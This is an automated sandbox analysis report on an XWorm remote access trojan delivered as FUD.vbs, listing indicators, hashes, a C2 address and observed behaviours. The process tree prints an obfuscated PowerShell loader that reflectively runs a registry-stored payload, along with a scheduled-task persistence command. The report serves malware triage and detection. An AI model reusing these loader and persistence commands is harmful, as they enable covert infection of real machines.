Analysis

  • max time kernel
    91s
  • max time network
    202s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    21-06-2024 20:40

General

  • Target

    FUD.vbs

  • Size

    51KB

  • MD5

    26bc3ae0510eb0a95be6a04e7bcbfcfd

  • SHA1

    02a8d91671167e9eb394e3be68c909c4b30212e8

  • SHA256

    825d0918656842496be2186889202fd231c7f823f2a8f788e7a8a2f3b91e1c28

  • SHA512

    be82ba27267d5486b2181a18cba0397587d5f3d3de573d9b2e3e0ba8e5479dbb15dfb3c708005c6c3882b592de24a8188e40942d8d8ccfe33f5377f9521e4f08

  • SSDEEP

    1536:x6wVdHzZQwZ9SkelLyAPh0voJKfI2jygScsddWZrv+V+:x6w7zJ9reVUvWII2gJdWZT+V+

Malware Config

Extracted

Family

xworm

Version

5.0

C2

modern-educators.gl.at.ply.gg:23695

Mutex

5TVJCEjsbmht8pkD

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops startup file 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs'; $impounding = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $impounding = -join $impounding[-1..-$impounding.Length];[<##>AppDomain<##>]::<##>('nonconstructivenessurrentDomain'.replace('nonconstructiveness','C'))<##>.<##>('handhiddenoad'.replace('handhidden','L'))([Convert]::FromBase64String($impounding))<##>.<##>('dynamistsntryPoint'.replace('dynamists','E'))<##>.<##>('Inpandiedoke'.replace('pandied','v'))($Null,$Null)<##>;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3756
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows backup" /tr "C:\Users\Admin\Windows backup"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4172
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows backup"
        3⤵
          PID:4736
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp55EB.tmp.bat""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1648
          • C:\Windows\system32\timeout.exe
            timeout 3
            4⤵
            • Delays execution with timeout.exe
            PID:244

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3n3c3uq.euk.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmp55EB.tmp.bat

      Filesize

      171B

      MD5

      7042c11eb8fc9c15c066d2a6ae961964

      SHA1

      a40c23cbf8ab7b28c7d1a11a4614ae906220468a

      SHA256

      aa183b22bfd130bcdd19b054ab7c707efd2c05086c64c76cfcb00cc760880535

      SHA512

      fceca003d2095e4a20299e1bc89dd67ca46322119c384384112e94a6693dfae8ce9ad6e6b9923bb7d6329bab3642589688964021b5b15238caf33dfb22d4fcf5

    • C:\Users\Admin\Desktop\CloseRevoke.exe

      Filesize

      126KB

      MD5

      7986b3b517f489617d79108122fcd8cf

      SHA1

      84f552ae09664b01d7373e991b1a13de4e87b9a9

      SHA256

      8db9f6122ec98cb9b193f686b1c14beabd5d704dae837aa9b681f81ecb65acf5

      SHA512

      cbc0b992724221bc0c9afd2c8632d8624a3804ab6517d48f5f215d2611ee3dc06d620db114546b11102506887daa0cc5b222438e63833fb1e5fecd3e837e4254

    • C:\Users\Admin\Desktop\ConfirmSend.odt

      Filesize

      233KB

      MD5

      94a8a32cf8dfddf84632d0a3c33cefe5

      SHA1

      bbede4cf5f5691dc13be3a227cf5dacf69620c95

      SHA256

      b9d852b551bce67e2a5c0b35ac415c81e541b5ac38034fdc29ab8675b1d7c09c

      SHA512

      b0694d60e86e647e91244f560fee19c83bf3357ac40608e1bd7e20781eb02bc256a873ed0257acc2aff26fe1f5a8161526f8bfcd4354cd1d32b4690b62d8d732

    • C:\Users\Admin\Desktop\ConnectStop.tif

      Filesize

      200KB

      MD5

      cc353cf6bed7da0eac3e767eaf403666

      SHA1

      4b451a58656fe9038d815a3da8099bc90d6cd80d

      SHA256

      cee873ccd4bc25d5d3650076866d946bd65369ba551259514f229a0f77c770c9

      SHA512

      0595e02a4c84622eec931199cc30016d66b9de741bc3ace82e6b2d501ec1aaeb70f6903be857d68bca5c649d493e80e4fe68aea63a8095c4eae3bd30d2d6de2d

    • C:\Users\Admin\Desktop\DismountExport.wmv

      Filesize

      217KB

      MD5

      dbbc8bad95d94a4815747f867a735ca1

      SHA1

      0fa74d91c3aedc1ea05592a9f88a53040bb6d4b1

      SHA256

      70fb38cd728c7f53bbabcf5d513ca46a8c8ec69e39e919ff012de3fcfd6a3602

      SHA512

      b66f5e0436c96f834995da554749d018813511ef7ecfa63bae21cd122ad128c0613df6b862c394caea4f9013fc49577a0e32ac98ac695aa4c673d51ee42e6989

    • C:\Users\Admin\Desktop\EnableCopy.7z

      Filesize

      110KB

      MD5

      fd1e66e0b4ee59c00a3faee2c3909220

      SHA1

      d1a2e3ccc183e948f3f3cecd9f7d678ee83359b8

      SHA256

      d20ca151c4250e1b7098a396133745bc7d14e5ab58ceebdde505e211d4550c68

      SHA512

      bf369cef7b6f550d168529e7befff98530353ac67d6deb21f0f65b419267bc6380b50f060eaa332f9f4f96c4c658e61395c4d52342d6e08a8b145da5023ac420

    • C:\Users\Admin\Desktop\ExpandDebug.jpg

      Filesize

      167KB

      MD5

      e8b13804c289df44e8434f76b05e9c15

      SHA1

      5db6b63657391a93e0413be87681922aec3932ce

      SHA256

      43552fe4655dfa5826292625dc20ebd8903a5943e60e10fad5f2d9ca43cf7208

      SHA512

      80c9028b4d8d3f720be48e9f1e43f4955052bc93ccc689bc8229d8f20e15955776961ad98f8e9be05861a4175fc6b4ea82301f03456a7aaeeceb16333fbfb856

    • C:\Users\Admin\Desktop\ExportReset.xlsx

      Filesize

      274KB

      MD5

      0542f85297fe66c231d4eec49bd8313a

      SHA1

      10ceb5155363beaf47449b980f8a16efabaeca20

      SHA256

      1184982bddc6bed09acd573f05343309084b16f248f203e3156739e3c5fb8dfe

      SHA512

      32ed3c5ee4be97a98fbf803c927c45abf940580b6fd434eca8546f45e01b9d363073aad51c2b3c68573f2b1734e2a370cf87038358ed0fc912d607b265db004b

    • C:\Users\Admin\Desktop\FindStep.css

      Filesize

      118KB

      MD5

      ef4d554bfd99d8da1ae8eb52f88e485e

      SHA1

      a940f9c9ca9c3f9c466e5e250c4681900b6af287

      SHA256

      8f4eb7fe0d8991bf95ee95e79b9b8af0ffeef9607ed1cd30372f24fc1238eb30

      SHA512

      97318d4bcf043b4c64b6dbc695e1edb0a8f976cff179387d4d7353d2aec2fdcf572606d1e56ec26e254b9aecfb3e05bb1fdd2d60847b14a06633a60cc6526b56

    • C:\Users\Admin\Desktop\FindUse.docx

      Filesize

      208KB

      MD5

      6c3e664da2573086709d18b3d777786e

      SHA1

      5b93a74805353a27e2570f125f4ed2ac8ce6781c

      SHA256

      455640aced94e6bc1e54c008d34a132c2e918dfff7685e81b39d298e8d5555e1

      SHA512

      4b70b2e62dec3ba0f8745d4d9c8f5e21d366217a67243571967a8fbbad8198b1832270549819530fd7834f777c55c4b69ae15899f70122b13ab64f2a20977da4

    • C:\Users\Admin\Desktop\Microsoft Edge.lnk

      Filesize

      2KB

      MD5

      8bd6778743049548d88fd68cead40673

      SHA1

      055c8880b05a6944d61960d0ef9ae2ab8d2d6d13

      SHA256

      1b9dd459eee3286e207f80698e90ac599b61e2613141b391c318a10caf54fa72

      SHA512

      a42b4a948de6c8552a9954e88c84eb08ae212653bf920e3a905bcb652ecf76ad81b55e23443b053cbadd62b44274372b39171c3a2a0f1e5634bee2a0708c8db4

    • C:\Users\Admin\Desktop\OutDisable.jfif

      Filesize

      258KB

      MD5

      338c2df1c8f6fcc751831566d950252a

      SHA1

      062324cc77147ccb00810c7cad98bc3424b39fdb

      SHA256

      e75bea9ed43b12e5ae88d8b154d94145e60244ef1ae40fe6ed2f4f34e8227df2

      SHA512

      dd6c27891acdd1324d659692d28a75780141e4c08bd8e845eadbe48d20740be67d42bcffbadb09cf52f1e3706c13f3d970e30c60c100a15ad46720de4422df99

    • C:\Users\Admin\Desktop\OutSwitch.html

      Filesize

      282KB

      MD5

      6bd9b40e6c55f845e0c93c0996d50767

      SHA1

      1426b8994e7943f9705a6544179bf1be617d43d3

      SHA256

      057a7d47a4a33b9b5a035a8c78319cc2d83a97e011c6d4e6c20813bdfddfc7a3

      SHA512

      6dd44dc0e178f4ef743884072e19b026a3d9c7fb633453295cefaf9a64d683d872edc7fe09a6a2078fdd446d0b448157e020a9a47906b1be1daf86657ac26eec

    • C:\Users\Admin\Desktop\PingOut.txt

      Filesize

      176KB

      MD5

      c32c641439e79a72c3136f286f8e5237

      SHA1

      317f0e592b5d7a108740540de16e4f780c1c445a

      SHA256

      a002f64564a71b51de263d2d6af5d94744d622bd6286c48056666c700dc5175e

      SHA512

      07232dd5dfac74dffe13ffb599d1b5516d284da4bd18cf059024ffd1023b9e8793ebab1b1fc1a1dfc0c699725f2dd5a8e311610946ca895eb1b3de068958f944

    • C:\Users\Admin\Desktop\PopDeny.docx

      Filesize

      159KB

      MD5

      e87cff96a2978aecda7de6575ab7526f

      SHA1

      183494e887ec59366f4e9b31dec50f74c1854b9d

      SHA256

      45a7ff7d9b2cb3d0a67591a23f8307003e57187d6dd9a30906af645802990e26

      SHA512

      671c8f1b41d5d2e91e49a9fbde1e4a92b4ce104a7ea301a5ac5c37dcfb434b97e9df080616cc8f49dbad769802586b5b3b75920d38ccdd3f0af52e53ec9a3cee

    • C:\Users\Admin\Desktop\ReadConnect.jpg

      Filesize

      401KB

      MD5

      0bba5dc28e5a60f457a07f78b5d3e43d

      SHA1

      8f3e60b559288f3b77a7c4e95b88db5a36a2dd77

      SHA256

      02ad4361ff95ee2f909551d9a6a296986c726ac2cefd9197f12c1ac72928e655

      SHA512

      6f69fac496cfe876b41367d366a85615d581586b7e99df9a941c129b5b85cfc3ef7f7880a07a922415ca0ff089e58b59e617c874594e06b9f582a8287675f31a

    • C:\Users\Admin\Desktop\RegisterDebug.wpl

      Filesize

      249KB

      MD5

      e20053933becd770dcab6630cdb74748

      SHA1

      1df3571a0f00605e1e41138278f1d63618d0ddac

      SHA256

      083b13b7d04ed76220aa1fb1cd77a3572a509f52b738a90d40ffc607f3f7caea

      SHA512

      b41c6a80ca606c7ed3659ff16ee74c3a4d9a1d30d084c578f4cc333c7b00bbd61fcd2976aafd44b76a6dec7d420309e774fa01344537bc18178d53ec27500623

    • C:\Users\Admin\Desktop\ResizeMerge.rtf

      Filesize

      192KB

      MD5

      14ad2250e861ea5bfd01f789972188ee

      SHA1

      3f8fb9415f9bb4946c777a5af1457073711411c0

      SHA256

      d5bb46894d0c200773ab8ec232a0ade11e0b43f1bdfe51cfcece93c60fd8b585

      SHA512

      0f9e13278dad276b21c29ef7de8624d1d27951fa5f5e533eaa6e267c391b799961b72774c9193ec45a31081bd50805bfc9d5abd8713960819b8a6e654f9cf22a

    • C:\Users\Admin\Desktop\ResizeTest.odp

      Filesize

      135KB

      MD5

      d321c265ba7a2b313d2d6bc30c1e0a37

      SHA1

      5c2a1d17feb7259d457f6d8fa5058db5afec9c94

      SHA256

      79f81c327985134d74e978430537bd7eb8d7f9b65c775a0b4dc1ea433d41cf7f

      SHA512

      b9c1efbaff2677169a2fc325c5ef5f0a4f92461c99d313726149958e6123a849e3be3e0e61a9dde4c92a701111353c84b036858bf2f4f2b3f7bc980a44caba52

    • C:\Users\Admin\Desktop\RevokeEdit.dot

      Filesize

      225KB

      MD5

      af6d1580060269b90686aabe1833f61e

      SHA1

      e1a8da0f2723e7eaa51d5b3c575f674fe745de05

      SHA256

      e16b73836a15d028600ae095b74f20438b514453788e46f9866ccbd2e34c5a6c

      SHA512

      f73f3c452ba7c1696e9e3704b83449ab2fdfacdccd7dc90fd5d656614e69e0c0272e3a8f8f624b5139da60f4130a587de0d213451271fabaecf7fe91aaac601d

    • C:\Users\Admin\Desktop\SkipCopy.cab

      Filesize

      241KB

      MD5

      ac78f601094e989bcd642b1badeb7e83

      SHA1

      85c4c32d0e496c975fc92275746c3c9de24c43b5

      SHA256

      d3c920184d9491cb7ae8b57000be92a3508345df70d471a67698a29b55d5c400

      SHA512

      9ed4f93a34fdebaac9ccf2285f1c8b77bf238b5c451fb1ffefb00e8c6d7024b0abe99d6f2e9c28de9d2f3a5cd12cec308dddb6eadfd116499f00b8d169cb99a1

    • C:\Users\Admin\Desktop\SwitchSubmit.iso

      Filesize

      143KB

      MD5

      3936334591fabba1ab7c66613cae789a

      SHA1

      fb7327e15408e4b2d13598ef68f91765a409e560

      SHA256

      8532511d4abfa14d335e672144566f63d1d18b527bc2f54b957fea79d95d29d2

      SHA512

      30fae0d788258b0bc729d3fb12e99de4f90bf2faec9d61399b87ee82d2bbb0eb341c4b57fc014606fd9a756bfffa101976779b832f80be93d898f560e0c2eceb

    • C:\Users\Admin\Desktop\SyncGrant.rm

      Filesize

      102KB

      MD5

      7b6f067931ad6057c806bacb5068fdc7

      SHA1

      bd98c7e26f0302b1bd5b935f684a39b9239ff4c0

      SHA256

      6de88ea9fe9eb233c4be7b77280374065d2ec18e40bd55645ce15c5b3e4cf9dd

      SHA512

      209aa77605fa8e4aabd229473da671f13e1ab814e6bad3a4191eb300fa0d7a122f1f701cb7c8e7ac452d424b1c4bf59a4d82b32f0db3ee273c2fd29547fe34b9

    • C:\Users\Admin\Desktop\UnblockUnprotect.odt

      Filesize

      151KB

      MD5

      fc2a7db6ced77008f49ea76806253610

      SHA1

      73049c82c2a8760bf4aa298b7c9ac8289764d2cb

      SHA256

      67bf4980fa5e358ecca3b8fa39a066c338efd9182cedcf6db9231f288c415b7c

      SHA512

      d86b4ed7beedd9c0a8fae80dfd799f319652bbc284591c89d181e294cd72b01acaf715bdeac3d6cec6d2d4fb96b2c3ed19a5d536615e0e381015eeca6788f83c

    • C:\Users\Admin\Desktop\UndoSplit.mid

      Filesize

      184KB

      MD5

      e711276eec6f475322a7632e9b291938

      SHA1

      3e47b6207c8d8b62a2f6ca27bc51377c02b545be

      SHA256

      407492babb42b73c36fed75f5092f33f8948f2ca4111ecdfed87d412f3b3edbf

      SHA512

      6e2ff1c158d6c000bbe0a83f9c2cd8deb7d4f8357a70ca8d281aa39993c822f0d81be6382c5a7757cd1daf261d486f50d91a75708d67858872d9912f79db7594

    • C:\Users\Admin\Desktop\UseExpand.m1v

      Filesize

      290KB

      MD5

      aa87869e275995b1e6387212d049b9b7

      SHA1

      12fe2f5bb81cab5c76970bb5901d8b1e4fadc51f

      SHA256

      3fd0912caebe501ae112787a2621fd31ce67c2b0e9b8d07af357db6668d50350

      SHA512

      05783195dcc067fd4c3e316f56d1a27af8aa364f1f89b89638e91c114521877c008bd552856fc92c02deacb3d95cc98316f7ebac76da5eacd086d41bc1f871b0

    • C:\Users\Admin\Desktop\UseSkip.rle

      Filesize

      266KB

      MD5

      b5799340ca2c56b3f188bdfaf3e95cc8

      SHA1

      cf3bece36d59c0ae21be2798eadf57114ea2c946

      SHA256

      b6d9b58735f9447ceab09849fbdacb8c65d536ed36d57dd1dbba498f56c6cbf5

      SHA512

      d60400cf8200b864852ffa17c112a036034266d8c58cc870f51a29310f09006b4d17471eea1f5c05dd9e1a99b5a82e119158a460d88619a50268b79b0674f21b

    • C:\Users\Public\Desktop\Acrobat Reader DC.lnk

      Filesize

      2KB

      MD5

      3332937217e7fc3a5994f76f77e4a494

      SHA1

      2c41a6c81255c2854ce06fe91595c82d1286960d

      SHA256

      17773d25ce1e097da6df927e39f80645cec3285f6a1b7ab29bb818e67bf4cc63

      SHA512

      c42aaa6db3f76a671d3aab8fc4acaa3a6b7825d1a54795639708530fc4ba361c54e004cc1119b72786cdec59eeadcef76752887ba476db84ca66f44993205573

    • C:\Users\Public\Desktop\Firefox.lnk

      Filesize

      1000B

      MD5

      2c07f1e472e3cba6aa935cfafca03051

      SHA1

      9691fb753c4fb7f1ea26781b08f26cab6e4ba22c

      SHA256

      32d675963d02343c0854fef3b004b57413e11571e0b8f8c94e468550d73df7e9

      SHA512

      2261be317c330e91fa76a2f7ba9836ed411014ea1ddc22eb9062c044bf21fd858f7211bf199f7ac7474306af9700ee8956c11c6d6d65b89cc2d5e63412ac05dd

    • C:\Users\Public\Desktop\Google Chrome.lnk

      Filesize

      2KB

      MD5

      d1435ac505580e87f8a3b30d2fe93a99

      SHA1

      e0f85c87d90a326bdaa3f7e5bad4fa090599698f

      SHA256

      a6e73a4bc4305745a8211123e806a39dc4f3149c19bc1a89d62e6ae2b6f824bd

      SHA512

      35b4838de98e194ab9285d9d6f19090aab7d397a677648fb4011735c66cd776f1679ff47658b1ad924dc5c1481903facd3dafb7d351d3c698318a452dc1c1880

    • C:\Users\Public\Desktop\VLC media player.lnk

      Filesize

      923B

      MD5

      0c7a77608acbf8767fe0441b8d33e842

      SHA1

      4676d9815f8c50bd9b92fe22ace1031e537e27a9

      SHA256

      4a9d8837aa082ff9716ec74f9c4b9d164ea1f4246b324b6e8e17f9de61e1fa46

      SHA512

      8ce663cd75bd65fdbcd51d4b71484d926ed80f5950b9379156c0fdaee10c4fd3bf575803bc1b2f146f0e5619bba9bf9477d3c8919c2ff0b67f54c075dc592d7d

    • memory/3756-0-0x00007FFD88A13000-0x00007FFD88A15000-memory.dmp

      Filesize

      8KB

    • memory/3756-22-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp

      Filesize

      10.8MB

    • memory/3756-21-0x00007FFD88A13000-0x00007FFD88A15000-memory.dmp

      Filesize

      8KB

    • memory/3756-20-0x0000018821B90000-0x0000018821B9C000-memory.dmp

      Filesize

      48KB

    • memory/3756-15-0x00000188212E0000-0x00000188212F0000-memory.dmp

      Filesize

      64KB

    • memory/3756-13-0x00000188216E0000-0x0000018821726000-memory.dmp

      Filesize

      280KB

    • memory/3756-12-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp

      Filesize

      10.8MB

    • memory/3756-23-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp

      Filesize

      10.8MB

    • memory/3756-11-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp

      Filesize

      10.8MB

    • memory/3756-10-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp

      Filesize

      10.8MB

    • memory/3756-9-0x0000018809150000-0x0000018809172000-memory.dmp

      Filesize

      136KB

    • memory/3756-63-0x00007FFD88A10000-0x00007FFD894D2000-memory.dmp

      Filesize

      10.8MB